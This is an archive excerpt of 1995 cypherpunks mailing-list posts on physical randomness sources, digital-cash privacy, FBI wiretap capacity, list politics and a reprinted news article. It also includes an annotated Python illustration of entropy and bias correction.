You're absolutely right. I wasn't thinking sensibly about HTTP.  I wanted to
make an argument about the time it would take to search the pool and serve a
results page. But upon reflection, I don't think that even holds up under my
HTTP delusions of yesterday, let alone a realistic view. Please ignore the
"reasonably long" part of my previous statement. Thanks for pointing that out.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Sat, 4 Nov 1995 12:59:49 +0800
To: cypherpunks@toad.com
Subject: Re: Sources of randomness
Message-ID: <199511032324.PAA22269@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm puzzled by the implication that thermal noise or avalanche or Zener
noise is somehow inferior to noise from radioactive sources.  It's not.

Take as an example Johnson noise, the voltage noise from a
resistance.  It's the result of the interaction of vast numbers
of electrons.  It is unpredictable in the same way that individual
radioactive decay events are unpredictable, and they are both
results of friendly quantum mechanics.

Small biases/interferences that come from nonideally sampling such
voltages do not matter, since the entropy is still 1-epsilon bits per
sample (more for nonbinary samples).  There is no "chink in the
armor" available for cryptanalysis---the user need only acquire
N*(1+epsilon) random bits rather than N bits.

The video-snow-noise described by Tim May is mostly Johnson noise
in the low-noise-amplifier electronics, not atmospheric or ionospheric
noise, at least above 50 MHz or so.

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Fri, 3 Nov 1995 16:34:17 +0800
To: bryce@colorado.edu
Subject: Re: [NOISE] Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511030614.XAA02702@nagina.cs.colorado.edu>
Message-ID: <Pine.LNX.3.91.951103152502.23689A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 2 Nov 1995, Bryce wrote:

> That's one way to look at it.  Of course since the "license 
> requirements" had to do with some obscure administrivia that nobody
> thought would apply to ISP's, none of the 6 or so ISP's in Hong Kong
> had thought to apply for it.  One has to wonder why the gov't pulled
> the plug on 5 of them without so much as a warning, much less a
> chance to comply.
> 
> 
> Did I say 5?  Oh yes.  The largest HK ISP-- and the one with closest
> ties to the government-- had gone ahead and applied for the license
> just a couple of weeks before the blackout.  Corruption is the modus
> operandi in HK, so I wouldn't be at all surprised if that one ISP
> got a special favor by being warned of the impending black-out, or
> even if it had a hand in instigating it.

Look: I've followed very closely all that sad story, as I routinely
participate in the meetings between the Government's Telecom regulator
(OFTA) and the representatives of the IT industry regarding ISP
regulations and the difficult relationships with the telephone carrier
(in the role, incidentally, of a strong advocate of de-regulation).

The cutoff was determined by an initiative of the Police's Commercial
Crime Bureau, tipped by complaints from that provider you're mentioning
(HK Supernet). The initiative was taken without any pressure from above,
and actually the CCB had to backpedal very hurriedly after the
intervention of several legislators (I assisted to an embarrassing panel
meeting where one of them scolded the chief of the CCB and advanced the
hypothesis of a possible lawsuit by the providers against the Government
for unlawful action, due to a few clumsy procedural "faux pas" by the
police). In other words, the whole matter looked more like "Inspector
Clouseau vs the ISP's" than a perfidious conspiracy to suppress the
freedom of speech. 

In any case, before Perry (rightly) sends us stern reminders of the scarce
crypto relevance of this thread, let's take it out of Cypherpunks and, if
someone is interested, let's continue by e-mail. 

Cheers --

Enzo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 5 Nov 1995 12:41:59 +0800
To: cypherpunks@toad.com
Subject: Real randomness generators
Message-ID: <9511032132.AA00195@all.net>
MIME-Version: 1.0
Content-Type: text


Two points:

	1 - The noisiest thing on most lists is the noise about other
	peoples' noise.

	2 - Why not use the postings of people complaining about other
	peoples' posts as a source for noise.  Surely few things in the
	Universe are more random.

On the subject at hand:

	There are two major technical issues I have encountered in using
EM waves (which is what video and radio noise are) for generating
randomness. 

	1 - They tend to be biased toward 1 or 0.  This can often be
	compensated for by (for example) xoring one bit stream from the
	same source with the inverse of another.  By doing this enough
	times, you can eliminate many of the characteristics of interest.

	2 - Noise tends to be characteristic for different media and noise
	causes.  This is a more difficult issue.  For example, certain
	types of media tend toward short noise bursts.  In these cases,
	you have to be quite careful to assure that the bit streams meet
	the randomness criteria of the application.

As a side issue, you may find that once you start sending enough
information with truly random characteristics, you will be visited by
people that don't want you sending it.  I know people who have
experienced these visitations and felt highly constrained as a result.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
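
Added example (not part of either original message): Python that works through the "1-epsilon bits per sample" arithmetic from Peter Monta's post and the XOR-with-inverse bias compensation and noise-burst concern from the post above. The function names, the 0.55 bias, the 0.9 burst persistence and the seed are constructed values; the min-entropy figure is included as the more conservative measure and goes beyond what either post states.

```python
import math
import random


def shannon_entropy(p):
    """Bits of Shannon entropy in one sample that is 1 with probability p."""
    if p in (0.0, 1.0):
        return 0.0
    return -p * math.log2(p) - (1 - p) * math.log2(1 - p)


def min_entropy(p):
    """Bits of min-entropy: based on the single most likely outcome."""
    return -math.log2(max(p, 1 - p))


def raw_bits_needed(n, p, measure=shannon_entropy):
    """Raw biased samples to collect before hashing down to n key bits."""
    return math.ceil(n / measure(p))


def xor_with_inverse(p1, p2):
    """P(out = 1) for out = a XOR (NOT b), with a and b independent."""
    return p1 * p2 + (1 - p1) * (1 - p2)


def fold(p, times):
    """Repeat the combination; each pass consumes twice as many raw bits."""
    for _ in range(times):
        p = xor_with_inverse(p, p)
    return p


def bursty_stream(n, stay, seed):
    """Bits that repeat the previous bit with probability `stay`.

    Models a medium with noise bursts: zeros and ones are equally common
    overall, yet neighbouring bits are strongly correlated.
    """
    rng = random.Random(seed)
    bit = rng.getrandbits(1)
    out = []
    for _ in range(n):
        out.append(bit)
        if rng.random() >= stay:
            bit ^= 1
    return out


def xor_adjacent_ones_fraction(bits):
    """Fraction of ones after XORing non-overlapping neighbouring bits."""
    pairs = [bits[i] ^ bits[i + 1] for i in range(0, len(bits) - 1, 2)]
    return sum(pairs) / len(pairs)


if __name__ == "__main__":
    p = 0.55
    print("epsilon (Shannon):", 1 - shannon_entropy(p))
    print("raw bits for 128 :", raw_bits_needed(128, p),
          "or", raw_bits_needed(128, p, min_entropy), "by min-entropy")
    print("P(1) after 1 and 2 XOR passes:", fold(p, 1), fold(p, 2))
    bits = bursty_stream(40000, 0.9, seed=1)
    print("bursty source P(1):", sum(bits) / len(bits))
    print("after XOR of neighbours:", xor_adjacent_ones_fraction(bits))
    print("entropy per bursty bit:", shannon_entropy(0.9))
```

The XOR passes shrink the bias only while the combined streams are independent; on the bursty stream the XOR of neighbouring bits comes out far from 0.5 even though the raw stream looks balanced.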




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Sun, 5 Nov 1995 02:10:04 +0800
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Real randomness generators
In-Reply-To: <9511032132.AA00195@all.net>
Message-ID: <Pine.SOL.3.91.951103170926.6180A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 Nov 1995, Dr. Frederick B. Cohen wrote:


> 
> As a side issue, you may find that once you start sending enough
> information with truly random characteristics, you will be visited by
> people that don't want you sending it.  I know people who have
> experienced these visitations and felt highly constrained as a result.



C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Sat, 4 Nov 1995 10:00:34 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Apologies for spam
Message-ID: <Pine.SOL.3.91.951103171035.6180C@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


C-punx

I really didn't mean to send that last message to the list.  I had 
stiffened my resolve not to rise to the obvious troll bait, but a minor 
seizure of some sort resulted in the send command being issued instead of 
the cancel command. . .

By way of making up for it I thought that some of you might be interested 
in knowing that AAAS is having its annual meeting in Baltimore this year 
and of interest to those pondering alternative means to bruting 
cryptosystems are the sessions below:

DNA Computing, Friday Feb. 9, 8:30 - 11:30 am
Organized by Richard Lipton, Princeton University

Quantum Computation, Friday Feb. 9, 2:30 - 5:30 pm 
Organized by Seth Lloyd, MIT

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 4 Nov 1995 09:40:02 +0800
To: cypherpunks@toad.com
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <acbf9ee00b0210044261@[205.199.118.202]>
Message-ID: <9511032235.AA13095@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi folks,

	There is a bug in mh mail that causes all mails to be rejected after
there are more than 9999 in the same mailbox. I received 100 in two hours
today so I suspect the subject line may well be related to my earlier post.
They mostly fell on the floor. The rest are 50-50 pro/anti.

	Just a calibration point. The libertarians on the list do not seem
to shrink from expressing their political views. Indeed the entire discussion
on the NSA is a political thread pure and simple. My post related directly
to the question of personal privacy rights in a democratic, plural society.
I do not regard that it was off topic in any sense. I was not aware that
any agreement was in effect as to the method by which goals might be 
achieved. I chose to pursue goals by the means most likely to succeed. In 
that I am a pragmatist. Government regulation often provides social benefits;
it is not by definition an evil to be avoided. In any case regardless of the
rhetoric government regulation increases, I prefer to press for some
regulations I like rather than dream about there being none whatsoever.

	I do not separate the question of politics from technology. My 
reasons for working on the Web have from the start been explicitly political.
I regard the pursuit of technology without consideration of the political
consequences to be unethical.

	I am only in a position to influence the political process if I
understand the position of the administration and can demonstrate an 
appreciation of their concerns. As Sun Tsu said "you must build a golden
path along which your enemies may retreat". The problem with government
is not that it is a conspiracy, it is an interlocking series of
bureaucracies which all seek to avoid responsibility. 

	If you want to get Phil Z. off the hook or foul up the government's
escrow scheme plans you have to be prepared to step into their mindset
and walk about on the inside a bit. Somewhere inside the government there is
a jobsworth who is deciding to hassle Phil Z., this person will be a civil
servant, not a political appointee. I.e. the dregs which get left behind each
time there is a new administration. What we need to do is to identify that 
person and nail their ass to the wall. It has to become apparent to the
administration that that individual has created an unnecessary source of
embarrassment. 

	It seems to me that the purpose of key escrow is not to allow the US 
govmt to spy on its citizens. I think they want to stop strong crypto getting 
out because there are still a large number of governments cables they can break 
and they want the fun to continue a while. No external government is going to 
trust a system that is clearly subject to US govt. interference.


	If someone comes up with a crypto proposal to avoid paying taxes I
know it will never get anywhere. If they come up with a crypto proposal that
guarantees that a tax is paid but conceals the identity of the persons
involved I get much more interested.

	If someone makes continuous political spiels themselves but objects when
I make one they disagree with (as one person has done) I am not going to take
their objection as indicating anything other than an inability to argue their
case.

		Phill

PS I'm also none too impressed by people who make comments like "you are wrong 
about XXX but I won't explain why".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 17:40:02 +0800
To: hallam@w3.org
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <9511032235.AA13095@zorch.w3.org>
Message-ID: <199511032304.SAA00611@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 	There is a bug in mh mail that causes all mails to be rejected after
> there are more than 9999 in the same mailbox. I received 100 in two hours
> today so I suspect the subject line may well be related to my earlier post.

There isn't such a bug in MH, but mhe, if you are using it, won't show
more than that number. Simply split your mailbox and all is well again.

> 	Just a calibration point. The libertarians on the list do not seem
> to shrink from expressing their political views.

I don't express my general political opinions very much at all. As it
turns out, I'm a very radical libertarian, and anyone reading my stuff
elsewhere would know that, but I don't discuss this stuff in public.

> Indeed the entire discussion
> on the NSA is a political thread pure and simple.

This list *is* political in the sense that it is for people who have
chosen the view that the spread of cryptography is good. It is not,
however, a list for just *any* political discussion. The topic is
purely cryptography, and we operate largely from the viewpoint that if
you think crypto is very evil you probably should discuss that
elsewhere.

> Government regulation often provides social benefits
> it is not by definition an evil to be avoided.

I would disagree, but that is a discussion for elsewhere.

> 	If someone comes up with a crypto proposal to avoid paying taxes I
> know it will never get anywhere.

A lot of what Tim May has been talking about here for many years is
the inevitability that cryptography will weaken current financial
controls -- sooner or later, whether the central governments want it
to happen or not.

> PS I'm also none too impressed by people who make comments like "you are wrong
> about XXX but I won't explain why".

I sent you a detailed explanation, in PRIVATE mail, of why you were
wrong about governments being the only way to provide roads, including
lots of counterexamples to your claim. However, this is not libernet,
this is cypherpunks, and this isn't a place for that discussion. That's
why I sent you PRIVATE mail.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Sat, 4 Nov 1995 15:58:41 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Real randomness generators
In-Reply-To: <9511032132.AA00195@all.net>
Message-ID: <9511032316.AA06015@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


	Dr. Fred writes:

> As a side issue, you may find that once you start sending enough
> information with truly random characteristics, you will be visited by
> people that don't want you sending it.  I know people who have
> experienced these visitations and felt highly constrained as a result.


	Could you possibly elaborate on this ?  Was this overseas
where the NSA might be presumed to be involved or domestically ?
(And of course was it in the USA or elsewhere ?)

> 
						Dave Emery 
						die@die.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Fri, 3 Nov 1995 15:55:51 +0800
To: bigmac@digicash.com (Marcel van der Peijl)
Subject: Re: Re: Chaum's cash: backup?
In-Reply-To: <199510241312.OAA00644@digicash.com>
Message-ID: <199511030729.SAA03867@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Marcel van der Peijl,
> From: "Marcel van der Peijl" <bigmac@digicash.com>
> Date:          Tue, 24 Oct 1995 14:10:58 +0100

Sorry about taking so long to reply... I'll quote more than usual
to make up for it.

> > > I could give a hint: your random state initializer is not the too-often 
> > > used srand( time( NULL ) ) but user-chosen during installation.

> > This sounds great... Will the bank be running crack against the proto-coins
> > it gets? (Say, at the behest of a LEA?)

> It is not the bank's intention to screw the clients, but mostly the 
> other way around.

I was referring to the claim that the system is payer-anonymous.

Thinking of it again now, what's to stop Eve the eavesdropper from spying
on the proto-coins, running crack against it, and then (later) 
eavesdropping on the bank-signed coins and unblinding/depositing them 
before Alice/Bob does?

(No, being encrypted by the bank's public key is not enough.)

> If the bank wants to screw the clients the easiest 
> way is to change their account balance. Remember, you trust them with 
> your money. That's why they're a bank.

Yes, but is the bank really interested in protecting privacy?

> > Is there any way for the user to re-initialize the random state?
> > > Write that initializer down and you can re-generate all coins.
> > ...
> > That's going to be one hell of a valuable piece of paper.
> > (Certainly to your enemies/prosecutors - it reveals the blinding factors
> > for every coin you ever spent.)

> You may choose to burn it or change random state and have no 
> recoverability. What do you value more? Your privacy or your money? 
> Each user will have to choose.

a) It would be nice if the protocol didn't require this choice.

b) This choice should be made explicit to the user.

c) As I noted above, wouldn't it also strongly reduce security?


See you!

Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMJnEeCxV6mvvBgf5AQF2BwP/XdMn6ktMGjToDltqo014kT1i3Z/GGXPr
HPW1gBN3RT3Ba9F2Ac+24IVVFqauo1sT+Ecc872UrlQzoF8S524oZfhjh3IW5xRF
mpZX48tnQn5nJE/U4XgvcuQ6yw5JOhc2eEVPs2PnKT+RdUogNb9UDAXOKn6+EILc
nqosNXK+aMU=
=geHb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 5 Nov 1995 01:14:14 +0800
To: Noah Brodbeck <nbrodbeck@hollandhart.com>
Subject: Re: Telephone switch capacity -Reply
In-Reply-To: <s09a7458.054@allegro.net>
Message-ID: <Pine.ULT.3.91.951103182313.3366A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[about the FBI supposedly wanting the ability to tap 1% of all phones in 
the US simultaneously]

EPIC, CDT, and the original source confirm that they're talking about
capacity, not total circuits. So what the FBI was asking for (not
demanding, certainly not dictating) by early 1999 (not Oct 1998, because
the ticker starts at the end of the comment period) was between 0.25% and
1% of the 10-20% of lines that the phone system can handle at once, or
between 0.025% and 0.2% of the lines. 

Of course the FBI doesn't have the staff to listen to all these lines, and
they need an individual court order to authorize each individual
interception, so this numbers game is a bit of a joke. 

There is no controversy about the number of wiretaps that have been
authorized, except as manufactured by the Spotlight folks and other
conspiracy loons. The EPIC FOIA request and lawsuit concerns the rationale
for the FBI's capacity request. 

It all makes a little more sense now. I had been wondering what the hell
the FBI had been smoking. Something not quite as strong as the stuff the
Spotlight people are smoking, it turns out. 

The FBI proposal is still Not A Good Thing, and deserves your interest 
and opposition. See http://www.epic.org/privacy/wiretap/oppose_wiretap.html 
for facts and reasonable responses. The CDT's page, at 
http://www.cdt.org/digtel.html, is better.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:17:28 +0800
To: cypherpunks@toad.com
Subject: Re: Many Topics are Appropriate for Discussion Here
Message-ID: <acc005a10e02100466ac@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 PM 11/3/95, hallam@w3.org wrote:

>        Just a calibration point. The libertarians on the list do not seem
>to shrink from expressing their political views. Indeed the entire discussion
>on the NSA is a political thread pure and simple. My post related directly
>to the question of personal privacy rights in a democratic, plural society.
>I do not regard that it was off topic in any sense. I was not aware that
>any agreement was in effect as to the method by which goals might be
>achieved. I chose to pursue goals by the means most likely to succeed. In
>that I am a pragmatist. Government regulation often provides social benefits;
>it is not by definition an evil to be avoided. In any case regardless of the
>rhetoric government regulation increases, I prefer to press for some
>regulations I like rather than dream about there being none whatsoever.

I for one have no problem with left-leaning (that is, nonlibertarian :-})
folks expressing views. That libertarians tend to be the most vocal and
perhaps most articulate advocates of strong crypto is only a trend: I know
of several left-leaning folks who strongly push crypto. We happen to
disagree on some points, but agree on others. On this list, Dave Mandl and
Rich Dutcher (probably no longer subscribed) have represented somewhat
leftist views.

The late John Brunner was a particular favorite of mine, whose "Stand on
Zanzibar" was an utter masterpiece, and whose "The Shockwave Rider" was of
course a major influence on many cyberspace privacy advocates. And yet he
called himself a leftist and was strongly opposed to the corporate state.

As I am, by the way. Much of the power of very large corporations comes
from the power of the State enforcing certain franchises and monopolies
granted to them. (Intellectual property laws are largely such
franchises---if one doubts this, imagine a return to the era of the guilds,
where the silversmith's guild could physically block other people from
smithing silver, and so on for all of the guilds. Modern intellectual
property law works mostly the same way, giving to Apple or Sun or Intel the
control a "truly free" market certainly would not.)

>        I do not separate the question of politics from technology. My
>reasons for working on the Web have from the start been explicitly political.
>I regard the pursuit of technology without consideration of the political
>consequences to be unethical.

I agree. And though I have been called an "ethical monster" for pushing my
agenda for crypto anarchy, I agree that one must always consider ethics and
politics in technological matters. (I suspect we disagree about many
conclusions of this view, however.)

>        I am only in a position to influence the political process if I
>understand the position of the administration and can demonstrate an
>appreciation of their concerns. As Sun Tsu said "you must build a golden
>path along which your enemies may retreat". The problem with government
>is not that it is a conspiracy, it is an interlocking series of
>bureaucracies which all seek to avoid responsibility.

I view governments as just another example of an organism or system which
perpetuates itself. It's in the genes. Evolutionary game theory, etc.

>        If you want to get Phil Z. off the hook or foul up the government's
>escrow scheme plans you have to be prepared to step into their mindset
>and walk about on the inside a bit. Somewhere inside the government there is
>a jobsworth who is deciding to hassle Phil Z., this person will be a civil
>servant, not a political appointee. I.e. the dregs which get left behind each
>time there is a new administration. What we need to do is to identify that
>person and nail their ass to the wall. It has to become apparent to the
>administration that that individual has created an unnecessary source of
>embarrassment.

This I think we have already been doing a pretty good job at. I have
been on panel discussions with Stewart Baker, former chief counsel of the
NSA (and now with Steptoe, a D.C. law firm, and still active in pushing
crypto legislation), and Ron Lee, the current chief counsel. And I spotted
Dorothy Denning's deep involvement several years ago. Ditto for key escrow.


And of course John Gilmore, Phil Karn, and others have been very active in
"nailing their asses to the wall," so to speak.

>        If someone makes continuous political spiels themselves but objects when
>I make one they disagree with (as one person has done) I am not going to take
>their objection as indicating anything other than an inability to argue their
>case.

As this post should make clear, I certainly don't object.

I doubt I'll have any energy to argue things I argued for the first time
almost 30 years ago, but I'm very interested in the nuts and bolts of how
strong crypto will affect institutions and policies.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 4 Nov 1995 10:03:16 +0800
To: cypherpunks@toad.com
Subject: Webernet Madne$$
Message-ID: <199511031826.TAA29048@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Wall Street Journal, November 3, 1995


Wall Street is in the throes of Internet mania. Or is it
Internet madness?

Investors have poured into Internet-related stocks in the
past couple of days, pushing some Web darlings such as
Spyglass and Netscape Communications to dizzying new
heights.

"People are blindly investing in anything that says
Internet," said Willian Bluestein, an analyst at
Forrester Research in Cambridge, Mass.

"Everyone wants to buy into the craze," says John
Sebrich, who works with mutual-fund investor Mario
Gabelli. ...

What is the big stampede all about? During the past week
or so, some of the highest-profile, highest-flying
Internet stocks have actually reported profits, a
development the Street wasn't expecting until next year
at best. ...

"The reason Intuit's moving up is the realization that if
you had to do the banking industry over again, you
wouldn't use brick and mortar," said Neal P. Miller,
manager of Fidelity Investments' New Millennium Fund.
"I think the size of this Internet thing is just dawning
on everyone," he said.

Neil Weintraut said, "Money managers are realizing that
there is tremendous strength behind this. It's not just
a technology chasing a marketplace." ... [and more gush]

______________________________________________________

Web and Wild [Chart]
______________________________________________________

                                             Percent
                              Yesterday's    Change
Company                       Close          This Week
______________________________________________________

Spyglass                      $70.50         +70%
Uunet Technologies             67.00         +41%
Netcom Online                  68.63         +30%
Performance Systems            21.25         +30%
Intuit                         82.75         +21%
Netscape                       98.25         +21%
______________________________________________________


-----

European Firms Join Research Group In Bid to Guide
Internet Development

By Douglas Lavin


Paris - - Afraid of being frozen out of the booming
interest in the Internet, 20 European companies joined
together to form the European arm of an Internet research
group.

The World Wide Web Consortium's European branch will work
with the U.S. Web consortium on such global issues as
electronic commerce, but it will also work on such
international issues as the use of languages other than
English on the Web, the multimedia portion of the
Internet.

"We must assure that the beautiful springtime of the
World Wide Web is not also the autumn of the French
language," said Elisabeth Dufourcq, France's secretary of
state for research at a conference here to announce the
creation of the European branch.

Several large European technology firms, including Oy
Nokia of Finland and Siemens AG of Germany, who are
hoping to play a major role in the development of the
Internet here ponied up $150,000 to join the consortium.
Particularly well-represented are telephone companies who
see the Internet as a threat to their ability to control
national voice and data networks. Among the European
members of the consortium, announced at a conference on
the Web here, are British Telecommunications PLC and the
national telecommunications companies of France, Germany,
Italy and Belgium. All five companies either offer or are
planning to offer Internet access.

One of the group's key tasks is to ensure that
improvements made by such rival companies as Netscape
Communications Corp. and Microsoft Corp., both members of
the U.S. consortium, don't create separate parts of the
Internet that can only be read by Microsoft or Netscape
software.

Membership in the European consortium, which is to be
based at the French national computer-research institute,
Inria, also shows a remarkable degree of interest in the
Web by the French business and government establishment,
which only a year ago dismissed the Internet as a
American version of France's Minitel network, but now is
avidly promoting the Internet's growth.
Among the members of the consortium from France are
Assurances Generale de France, the insurance company;
Electricite de France, the electricity company; Cie. des
Machines Bull, the computer maker; Aerospatiale, the
aerospace concern; and Thomson-CSF, the arms
manufacturer, all of them state-controlled, as well as
such private concerns as Alcatel-Alsthom SA and Groupe
Michelin.

Inria, which already has taken over some Web research
work from CERN, the nuclear-research organization in
Switzerland where the Web was created in 1989 by Tim
Berners-Lee.

Mr. Berners-Lee, now at the Massachusetts Institute of
Technology, is heading both the U.S. and the European
research consortia.

[End]

-----


Nuclear research > munitions research > controlled crypto > 
controlled commerce > economic espionage > ten thousand-year 
reign of the PGP-DigiBank-MIT-CERN crypto-commo-libertarian 
nerds.


Phill, what's the admission code to W3 world domination?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:17:09 +0800
To: cypherpunks@toad.com
Subject: [political NON-noise] Re: Crypto & Taxes
Message-ID: <acc00b1210021004adbd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:03 AM 11/4/95, s1113645@tesla.cc.uottawa.ca wrote:

>Not that I want to get into a big political discussion, but David Friedman
>has a nice, calm and rational book called The Machinery of Freedom, 2nd ed,
>which argues anarchism/libertarianism from an economist's point of view.
>The argument is not cased in terms of ethics and morals but rather
>economic efficiency and utility. Slim, easy to read and cheap. He also
>has a good sense of humor. Unfortunately the book is currently on back order.
>I'm holding on to my library copy until they ship one to me.

David Friedman is now teaching law at Santa Clara University, over in
Silicon Valley. We've been in contact, and expect to meet for dinner
sometime soon. (He attended a special Cypherpunks meeting a few years ago.)

>You can butt heads with him and Tim on the cyberia list (I don't remember
>the address but they have it at news://nntp.hks.net )

Ah, but the Cyberia list is a _law_ list, and political discussion is
discouraged.

>I gather from the cyphernomicon that someone recently converted him to
>cryptoanarchy.

His "Machinery of Freedom" and many other articles clearly establish him
as a leader in this area. He didn't previously know a lot about strong
crypto, but now he sees that this makes many of the abstract ideas of
"Machinery" near at hand.

Vernor Vinge believes the same thing.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 4 Nov 1995 10:08:55 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511031947.OAA00318@jekyll.piermont.com>
Message-ID: <199511040030.TAA28181@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> I don't care about quantity. Steve Bellovin is worth 500 subscribers
> -- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
> lot of this stuff than most of what passes for careful thought from
> the average person here.

I have some not-so-hypothetical questions: 

Suppose I have serious and plausibly realistic aspirations to become an 
authority in some subtopic of cryptography, network security, etc. (sometime 
well into the next millennium). Am I more likely to learn and hone my skills
by actively participating (sticking my neck out) or merely lurking
indefinitely ?  Regardless of the answer to the previous question, should
the list suffer me my missteps and naivete ?

I do not consider these questions rhetorical, and the answers are very
important to me on a personal level.

And now I believe I'll shut up for a while.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sat, 4 Nov 1995 10:17:34 +0800
To: cypherpunks@toad.com
Subject: public random numbers
Message-ID: <01HX7UTFXLK29BWWKZ@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 03 Nov 1995 00:44:02 -0800
>From: tcmay@got.net (Timothy C. May)
>Subject: Re: video as a source of public randomness
>
>At 6:23 AM 11/3/95, JMKELSEY@delphi.com wrote:
>
>>This seems like a potential source of a stream of public random
>>bits.  If these can be authenticated and matched, this kind of thing
>>can be useful in a lot of protocols.  For example, if there is some
>
>I'm not sure what you mean by "public random bits"...I don't plan to share
>my random bits with anyone, nor do I see any need for "public" random bits
>(except for some well-known situations involving statistical testing, for
>which certain PRNGs are actually preferable to "real" random numbers).

Imagine there is a stream of totally random bits over which neither
Alice nor Bob has any control.  We can use this to make a lot of
interactive protocols non-interactive.

Suppose we have a protocol where we need a random challenge from
Bob.  Alice sends a message to Bob starting the protocol, stating
that the public random bit stream is currently at bit i, and
committing to use the n-bit string starting at position (i+t) as the
challenge.  The t parameter here needs to be large enough to ensure
that Bob receives and logs the message before the public random bit
stream outputs bit i+t.  Alice proceeds with the protocol, using the
n-bit string starting at bit (i+t) as the challenge.  She sends the
resulting message to Bob.  No interaction was required of Bob--he
merely had to log the times of the messages, and keep track of the
public random bits.  This could be really useful implementing
noninteractive digital cash schemes, I think, because the merchant
wouldn't have to send anything back.  (The merchant can also be very
hard to track down by following the messages, since these messages
of Alice's can be encrypted under his public key and posted to a
newsgroup or something, though this implies really large values of
t.)

Naturally, this only works if Alice and Bob get the same random
string, and if it's not possible for anyone to alter the public
random bit string either one receives.  For large-scale
applications, the way to do this is probably to put a hardware RNG
into a communications satellite, and devote one channel to
continuous digitally-signed packets of random data.  For
smaller-scale or underground applications, it might be sufficient to
